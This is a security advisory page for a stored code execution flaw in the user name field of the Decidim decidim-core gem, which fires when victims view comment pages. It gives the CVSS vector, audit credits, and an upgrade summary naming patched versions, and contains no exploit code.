EUVD-2026-22024
GHSA-fc46-r95f-hq7g
CVSS VectorNVD
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:L/SC:H/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3DescriptionNVD
Impact
A stored code execution vulnerability in the user name field allows a low-privileged attacker to execute arbitrary code in the context of any user who passively visits a comment page, resulting in high confidentiality and integrity impact across security boundaries.
Patches
N/A
Workarounds
Not available
References
OWASP ASVS v4.0.3-5.1.3
Credits
This issue was discovered in a security audit organized by octree and made by Secu Labs against Decidim financed by the city of Lausanne (Switzerland).
AnalysisAI
Stored code execution in Decidim's user name field allows authenticated attackers with low privileges to inject malicious code that executes in victims' browsers when they view comment pages, enabling account takeover and data theft across trust boundaries. The vulnerability affects the decidim-core RubyGem component. …
Sign in for full analysis, threat intelligence, and remediation guidance.
RemediationAI
Within 24 hours: Inventory all Decidim installations and identify current decidim-core versions in production. Within 7 days: Upgrade all instances to decidim-core version 0.30.5 (for 0.30.x branch) or 0.31.1 (for 0.31.x branch) or later; if on versions prior to 0.30, evaluate upgrade path to supported branches. …
Sign in for detailed remediation steps.
Share
External POC / Exploit Code
Leaving vuln.today